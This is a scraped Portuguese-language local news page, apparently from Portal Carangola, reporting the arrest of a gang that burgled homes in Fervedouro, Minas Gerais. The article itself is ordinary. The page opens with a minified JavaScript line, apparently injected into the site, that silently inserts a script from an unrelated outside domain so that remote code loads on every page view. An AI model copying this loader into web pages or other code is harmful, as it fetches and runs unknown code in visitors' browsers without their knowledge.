;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Quadrilha que praticava furtos em Fervedouro é presa pela PM. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Quadrilha que praticava furtos em Fervedouro é presa pela PM.

A Polícia Militar prendeu, na noite sábado (17), uma quadrilha que vinha praticando vários furtos na região de Córrego Ribeirão do Jorge, no município de Fervedouro.
Para entrar nas casas, o bando arrombava portas, portões e janelas com machados e foices.
Uma das vítimas acionou a PM e apontou os suspeitos. Segundo esta pessoa, foi possível chegar aos membros da quadrilha a partir de informações de populares residentes nas proximidades. A vítima/testemunha contou aos militares que seguiu rastros dos suspeitos e, durante todo o percurso até a casa de uma das autoras, acabou encontrando, caídos, alguns materiais retirados de sua própria residência.
A Polícia compareceu à casa da suspeita, de 42 anos, onde foram encontrados vários objetos furtados. A mulher relatou que residia ali há 15 dias, juntamente com seus três comparsas – um de 19 anos, outro de 35, e um menor.
Os autores, que já tinham passagens na Polícia por furto, receberam voz de prisão e foram levados para a Delegacia. Já o menor foi encaminhado ao Conselho Tutelar.
Entre o material roubado que foi recuperado, havia vários artigos de cama e mesa (fronhas, utensílios de cozinha, panelas), aparelhos de TV, de DVD e de som, play station, antena, roupas, teclado musical, receptores de parabólica, mídia piratas de DVD, etc.


Informações e fotos: Rádio Muriaé


Ofertas clique aqui


[vitrine]cameras[/vitrine]

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.